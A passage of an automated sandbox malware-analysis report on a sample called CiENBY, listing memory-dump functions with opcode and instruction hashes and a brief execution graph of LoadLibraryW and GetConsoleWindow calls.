                                                                                • Opcode ID: 4063691b94295dccd1a230d8e8aad64061fbbbb7f7ea47158ce077da910d8e5f
                                                                                • Instruction ID: 3ce392bc1da0c24fa8656b7394aecbcf4ccf719bab337e74211fc2ee9dfcd9fb
                                                                                • Opcode Fuzzy Hash: 4063691b94295dccd1a230d8e8aad64061fbbbb7f7ea47158ce077da910d8e5f
                                                                                • Instruction Fuzzy Hash: C61106B5810759DFDB20CF9AC545BEEBBF8EB48320F108459E558A7240D375A944CFA1
                                                                                Function 0A9C061B Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1969995107.000000000A9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a9c0000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <
                                                                                • API String ID: 0-4251816714
                                                                                • Opcode ID: 0f7f7cf8c2c0149eed4773588ba81e5e76d2e0c866d6449516336971cd542d69
                                                                                • Instruction ID: f64c8e037d51dcdf2351816b88e2164364094dbc8c580467932cb7d05f4ce148
                                                                                • Opcode Fuzzy Hash: 0f7f7cf8c2c0149eed4773588ba81e5e76d2e0c866d6449516336971cd542d69
                                                                                • Instruction Fuzzy Hash: 9CE0863014E388EBDB12DBB1A5166A97F6C9743204F0805DFD485535A2EA350B04D777
                                                                                Function 0A9C0628 Relevance: 1.3, Strings: 1, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1969995107.000000000A9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a9c0000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <
                                                                                • API String ID: 0-4251816714
                                                                                • Opcode ID: 9e1338b91534028c58b978815444695357e35d0e60fdccb9dd19faa5bacfc281
                                                                                • Instruction ID: 00a5ff07aaa59c543b994714b1bd0f003881c395e9a979b61fc8134f440d2095
                                                                                • Opcode Fuzzy Hash: 9e1338b91534028c58b978815444695357e35d0e60fdccb9dd19faa5bacfc281
                                                                                • Instruction Fuzzy Hash: FCD0A73028A20CE6DF20DFA5D506B6977ACC742204F0449AC940913150AA710D04EA77
                                                                                Function 0A9C0040 Relevance: .3, Instructions: 293COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1969995107.000000000A9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a9c0000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9ca00c7ddc13899effd7fcdb323c85bee117e8b7c25285f002be25ce8441069
                                                                                • Instruction ID: 9bade1060a74418c44cab91315ed6cbb1ae35967f9f79b8296598b5d61aebd16
                                                                                • Opcode Fuzzy Hash: d9ca00c7ddc13899effd7fcdb323c85bee117e8b7c25285f002be25ce8441069
                                                                                • Instruction Fuzzy Hash: 6AB18874B01608DFDB14DBA8D594AAEBBF6AF88300F2540A9E505EB3A1DB30ED41CF51
                                                                                Function 012DD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957106441.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_12dd000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b31226779ee27cbaf7c334466e9d0e71fdbeaf0f0bd8523772b797b4f67cce39
                                                                                • Instruction ID: eaf2777242d679ea87a0f60a481e811d711f52a738f331c700faee0fcea81554
                                                                                • Opcode Fuzzy Hash: b31226779ee27cbaf7c334466e9d0e71fdbeaf0f0bd8523772b797b4f67cce39
                                                                                • Instruction Fuzzy Hash: B72145B5514648DFDB01DF98C9C0B66BFA5FB88324F24C56CEA090B286C336E406CAA1
                                                                                Function 012ED01C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957164467.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_12ed000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: beda64ae04b200e12ce271ba65b405f3ccd0f2b94e86188199f5929e3bfd3a13
                                                                                • Instruction ID: 705ad4e16760e674073c6b9e728ce1d1418286ca9e4f52ba6a6df486605d1f3c
                                                                                • Opcode Fuzzy Hash: beda64ae04b200e12ce271ba65b405f3ccd0f2b94e86188199f5929e3bfd3a13
                                                                                • Instruction Fuzzy Hash: 35212271614208DFDB15DF68D888B26BFA5FB88314F68C96DE90A4B246C37BD407CA61
                                                                                Function 012ED1D4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957164467.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_12ed000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 61d907a4c07cab76bffe46fb20c010973b486322284d85244b3f30682057cf1a
                                                                                • Instruction ID: acb0646f760579f7244f283fb8105e31ae000f9fb85dda766b39b56fe9db672a
                                                                                • Opcode Fuzzy Hash: 61d907a4c07cab76bffe46fb20c010973b486322284d85244b3f30682057cf1a
                                                                                • Instruction Fuzzy Hash: 2C214975514208DFDB01DF98C5C4B26BBE5FB88324F64C56DE9094F283C376D406CA61
                                                                                Function 012DD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957106441.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_12dd000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                • Instruction ID: 50b7d9a6371b3a223502b3583cb8bc0384214f24a3df67e32c52bf5618cb3773
                                                                                • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                • Instruction Fuzzy Hash: 51112676404684DFDB12CF44D5C0B56BF71FB84324F24C2A9DA090B257C33AE45ACBA1
                                                                                Function 012ED1CF Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957164467.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_12ed000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction ID: 3305b1da3de708254870f5c62f2929fe4a320120cddd895468587ec33633dfe5
                                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction Fuzzy Hash: 5211BB75504284DFDB12CF54C5C4B15BBA1FB84224F24C6A9D9494B297C33AD40ACB61
                                                                                Function 012ED017 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957164467.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_12ed000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction ID: 8148fa9f4e888b2e4de176e1eb8fa35d9184ffa4cf842c6a1cd1efd30ff200b7
                                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction Fuzzy Hash: 0911DD75504284CFDB12CF58D5C8B15FFA2FB84314F28C6AAD9094B656C33BD40ACBA2
                                                                                Function 012DD759 Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957106441.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_12dd000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ad4a55129c52b1e53fc65ac9d2b2dde5f1a49ec87af36656a5abc3e20d0de6ab
                                                                                • Instruction ID: 8cf852d3b0a6f7c3b4aea7444a5d5a95f45425e0d18a896890d99231b84582e1
                                                                                • Opcode Fuzzy Hash: ad4a55129c52b1e53fc65ac9d2b2dde5f1a49ec87af36656a5abc3e20d0de6ab
                                                                                • Instruction Fuzzy Hash: 5C01207101478499F7158B5ACC80776FFA8DF45320F19C899EE094E2C6C3789840C671
                                                                                Function 012DD758 Relevance: .0, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957106441.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_12dd000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c6b8fdb4a7ca48bb5617cadede0d49de2f422f2954b315d24202ea0139f3f48
                                                                                • Instruction ID: f08281f07d6c2f06e639323673ea3fd178839aca065ae106e452a5451d4b1d62
                                                                                • Opcode Fuzzy Hash: 8c6b8fdb4a7ca48bb5617cadede0d49de2f422f2954b315d24202ea0139f3f48
                                                                                • Instruction Fuzzy Hash: 92F0C831004784AEF7158A0ACC84B62FF98EF40634F15C45AEE084B286C3795844CA71

                                                                                Execution Graph

                                                                                Execution Coverage:14.7%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:30
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 27283 6116361 27284 61162fc 27283->27284 27285 611636a 27283->27285 27289 61173f1 27284->27289 27293 6117400 27284->27293 27286 611631d 27290 611738d 27289->27290 27290->27289 27291 6117451 27290->27291 27297 6117148 27290->27297 27291->27286 27294 6117448 27293->27294 27295 6117451 27294->27295 27296 6117148 LoadLibraryW 27294->27296 27295->27286 27296->27295 27298 61175f0 LoadLibraryW 27297->27298 27300 6117665 27298->27300 27300->27291 27261 2630871 27265 26308d8 27261->27265 27270 26308c8 27261->27270 27262 2630889 27266 26308fa 27265->27266 27275 2630ce0 27266->27275 27279 2630ce8 27266->27279 27267 263093e 27267->27262 27271 26308fa 27270->27271 27272 2630ce0 GetConsoleWindow 27271->27272 27273 2630ce8 GetConsoleWindow 27271->27273 27274 263093e 27272->27274 27273->27274 27274->27262 27276 2630d26 GetConsoleWindow 27275->27276 27278 2630d56 27276->27278 27278->27267 27280 2630d26 GetConsoleWindow 27279->27280 27282 2630d56 27280->27282 27282->27267

                                                                                Executed Functions

                                                                                Function 061175E8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,061174A6), ref: 06117656
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097616107.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6110000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: a37b56fb4def6d3284aec3b57524fe7d00d8daa61a6fb617237d5db7e183a2b7
                                                                                • Instruction ID: a6c814c76ce78ee7443ece5cfc8548a9d0c778e0c18af3f3638cfd869a531731
                                                                                • Opcode Fuzzy Hash: a37b56fb4def6d3284aec3b57524fe7d00d8daa61a6fb617237d5db7e183a2b7
                                                                                • Instruction Fuzzy Hash: 601114B5C006498FDB10DFAAD444ADEFBF4EF88220F14842AD419B7750C375A546CFA5
                                                                                Function 06117148 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,061174A6), ref: 06117656
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097616107.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6110000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 5cddf49035d9d5aec6828a8f5248ee38ec96c66fb81014738e5129e938116753
                                                                                • Instruction ID: a4289b3e0206c40ce8ffb572a8b125942fe85661fbe020e4987e30624520f73c
                                                                                • Opcode Fuzzy Hash: 5cddf49035d9d5aec6828a8f5248ee38ec96c66fb81014738e5129e938116753
                                                                                • Instruction Fuzzy Hash: CA1112B1C006898FDB10CF9AD844A9EFBF4EB88220F14842AD419BB340D375A545CFA5
                                                                                Function 02630CE0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080747573.0000000002630000.00000040.00000800.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_2630000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWindow
                                                                                • String ID:
                                                                                • API String ID: 2863861424-0
                                                                                • Opcode ID: 8d4a6cb1734837e2455e2653b7c454e3ab700da5a9f09b2e6731e604001a19b6
                                                                                • Instruction ID: f77b3851ca6f5af31a1027c0913194b74dac5d3700d4e0ba63d513bcf03c0c5f
                                                                                • Opcode Fuzzy Hash: 8d4a6cb1734837e2455e2653b7c454e3ab700da5a9f09b2e6731e604001a19b6
                                                                                • Instruction Fuzzy Hash: DC115871D002488FDB20CFAAD4557EEFFF5EB88324F24881AC459A7640CB796905CF90
                                                                                Function 02630CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080747573.0000000002630000.00000040.00000800.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_2630000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWindow
                                                                                • String ID:
                                                                                • API String ID: 2863861424-0
                                                                                • Opcode ID: 19c0a36e6565f3b9ffb5b91d16cd09bf390f2e271a729dd4259db3a3c453e125
                                                                                • Instruction ID: 17634930d1987a9b4e2a3353110c6414803e205bc74c297d640466410d5a6bb9
                                                                                • Opcode Fuzzy Hash: 19c0a36e6565f3b9ffb5b91d16cd09bf390f2e271a729dd4259db3a3c453e125
                                                                                • Instruction Fuzzy Hash: 61113671D002498FDB20DFAAD44579FFBF8EB48324F148419C419A7240CB79A544CFA0
                                                                                Function 06161550 Relevance: 1.4, Instructions: 1419COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4ac2ba5d6d3bd8a715ae5d51b0bbda474f58cb757e521648a1d1ca02dfa84156
                                                                                • Instruction ID: 509e8e8a11a790361303e415269f270d6eadda39028533a799959b4ea27611ec
                                                                                • Opcode Fuzzy Hash: 4ac2ba5d6d3bd8a715ae5d51b0bbda474f58cb757e521648a1d1ca02dfa84156
                                                                                • Instruction Fuzzy Hash: E1C22D74B002189FDB64DF59C891EAEBBB6FF88700F508099E606AB361DB71AD41CF51
                                                                                Function 0616349D Relevance: 1.3, Instructions: 1275COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 30be8c6ba0dfbf247b6d0ca94c4184b0743391e3d3f856b1fcc0d713fcbded5d
                                                                                • Instruction ID: 5bcdb6861a3c458a4b51df654f25b7cb05bd25912ef81ec02d4113a9c331206e
                                                                                • Opcode Fuzzy Hash: 30be8c6ba0dfbf247b6d0ca94c4184b0743391e3d3f856b1fcc0d713fcbded5d
                                                                                • Instruction Fuzzy Hash: C9A1B178B002859FCB45DF69C854A7EBBF6EF89700B1494AAE516DB3A2CB30DC11CB51
                                                                                Function 06160048 Relevance: .7, Instructions: 665COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 51b7b576aa7bdfb4e938b169f03713c914226be4b10c25d5cd10cd6251e96592
                                                                                • Instruction ID: 1606f2c42d55ebaac59284c2c24864bdcec5253c0f7e7ee1bddcd20833196362
                                                                                • Opcode Fuzzy Hash: 51b7b576aa7bdfb4e938b169f03713c914226be4b10c25d5cd10cd6251e96592
                                                                                • Instruction Fuzzy Hash: 0C428774B00A158FDB24EF7AC450A6EBBB2FFC5310B114A9CE4039F391DB75A9018B82
                                                                                Function 06160000 Relevance: .4, Instructions: 352COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1726bee24b6b38019c5e7f0d5408ec2c11e6112a590d05a6d7ee75608239f489
                                                                                • Instruction ID: 4ddf14fd6503c9d5968ae17351739d1bcf5b93a012dd28b95bbd7a620f9f9488
                                                                                • Opcode Fuzzy Hash: 1726bee24b6b38019c5e7f0d5408ec2c11e6112a590d05a6d7ee75608239f489
                                                                                • Instruction Fuzzy Hash: C1D1AD38B042449FDB11DF65C955A6E7BB6FF89300F15818AE9028F3A2CBB1DC55CB91
                                                                                Function 06160047 Relevance: .3, Instructions: 314COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 00895003cb43713a841ccdf8af865939c524bfd12ae39852226faa78343f1fb6
                                                                                • Instruction ID: 469b4868e3458b272569f148ae5080b8bbc5f9d0b501f2fc23bddbb1c30e380e
                                                                                • Opcode Fuzzy Hash: 00895003cb43713a841ccdf8af865939c524bfd12ae39852226faa78343f1fb6
                                                                                • Instruction Fuzzy Hash: 10C18934B00204DFEB14DFA9C955A6EBBB6FF88301F158199E9129F3A1CBB1D851CB91
                                                                                Function 061611A8 Relevance: .2, Instructions: 204COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 24e4389c5a394b64b833366d23b1151a7b1c0638d28e0f17c2f533ff956afb2c
                                                                                • Instruction ID: 91de59da66d9f16a6b13468a792e2f64243df33c6e4d571202de5cf041f9a2ba
                                                                                • Opcode Fuzzy Hash: 24e4389c5a394b64b833366d23b1151a7b1c0638d28e0f17c2f533ff956afb2c
                                                                                • Instruction Fuzzy Hash: 1151393AB042059FCB549B7ED84157AB7F5EFC6221B24857EE846CB211EB31C855C7E0
                                                                                Function 0616338B Relevance: .1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dc782d96d1de5b83274a7c92c4d5e70c1817ac22317919b4a65bbf74fdb7e103
                                                                                • Instruction ID: cd9f28d58c3908058b0dcefbcd0915f02cc64bc91ed5ec4b7d132c007a826c8c
                                                                                • Opcode Fuzzy Hash: dc782d96d1de5b83274a7c92c4d5e70c1817ac22317919b4a65bbf74fdb7e103
                                                                                • Instruction Fuzzy Hash: 46215A39B001049FCB14CF69D884EA9BBB2EF88714F5180A9F9069F3A2DB31EC01CB10
                                                                                Function 00CED054 Relevance: .1, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2079739650.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_ced000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9d4811c868f4d102e34e1b1fcf55a6a1e0f684f1bc284c55ae1740131d9ef490
                                                                                • Instruction ID: 87659ecc4fb16d6199496de414e7cde92eb5390458d0170197f11da4606e8a75
                                                                                • Opcode Fuzzy Hash: 9d4811c868f4d102e34e1b1fcf55a6a1e0f684f1bc284c55ae1740131d9ef490
                                                                                • Instruction Fuzzy Hash: 2321F872504280DFDF15DF15D9C0B2ABFA5FB88324F24C669E90A0F256C33AD816DBA1
                                                                                Function 025AD2C4 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080084506.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_25ad000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e202e6621097515eceb2bd540e8235f41d0cb5b0e7c813b2e79c47b42a58b4e7
                                                                                • Instruction ID: 801c6b38e1155fdb736c5aa693f0244500d4a62cbb4fb5a0144719abd19ec27b
                                                                                • Opcode Fuzzy Hash: e202e6621097515eceb2bd540e8235f41d0cb5b0e7c813b2e79c47b42a58b4e7
                                                                                • Instruction Fuzzy Hash: 812135B1505240DFDB00EF14D9D1B2EBFB5FB88324F24C96EE84A4B646C33AD406CAA5
                                                                                Function 025AD474 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080084506.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_25ad000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 27855e79eed78b1386f96fe908b590f349f94e0dfcddd9073b5e6d43e9dcdd6a
                                                                                • Instruction ID: 58a51d36cb1065f6ac0de9a397d668d4e7f2606df42f586e86104e11fd25a534
                                                                                • Opcode Fuzzy Hash: 27855e79eed78b1386f96fe908b590f349f94e0dfcddd9073b5e6d43e9dcdd6a
                                                                                • Instruction Fuzzy Hash: C32137B1504200DFDB04EF14C5D0B2ABFB5FB88718F24C96DE9094B652C37AD806CA66
                                                                                Function 00CED04F Relevance: .1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2079739650.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_ced000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f30bf31a0b928eb9e8b34aa75df187a12aef3d2722db20fa6917a23a38658ef
                                                                                • Instruction ID: d1e9862270e30de7117b5b2c19164f58e33e8f86cc65e38b29645cd3a86b6100
                                                                                • Opcode Fuzzy Hash: 1f30bf31a0b928eb9e8b34aa75df187a12aef3d2722db20fa6917a23a38658ef
                                                                                • Instruction Fuzzy Hash: 8121AF76504280DFDF16CF10D9C4B1ABF72FB88324F2486A9D9494B256C33AD926DB91
                                                                                Function 025AD2BF Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080084506.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_25ad000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dbaf75085fc22f833f0b1a4cd21174c7d9e2605de8d0ad4da8cea6ae113ecf4b
                                                                                • Instruction ID: bb53af2daa0bdd8644b53727a4e0562da2f94b89dbd4c77a534135c2d2a1cd70
                                                                                • Opcode Fuzzy Hash: dbaf75085fc22f833f0b1a4cd21174c7d9e2605de8d0ad4da8cea6ae113ecf4b
                                                                                • Instruction Fuzzy Hash: 9A110176505280CFDB12DF10D5D0B1AFF71FB84324F28C6AAD8494BA46C33AD40ACBA2
                                                                                Function 025AD46F Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080084506.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_25ad000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction ID: d8644a944bed952d9da69c2230730c19f960629d6bbfb96516636949e08fb7ce
                                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                • Instruction Fuzzy Hash: 9911DD75504280CFDB01DF10C5D4B19BFB2FB88318F24C6AAD9494B656C33AD80ACB62

                                                                                Non-executed Functions

                                                                                Function 06160D50 Relevance: 10.3, Strings: 8, Instructions: 300COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                                • API String ID: 0-3970889292
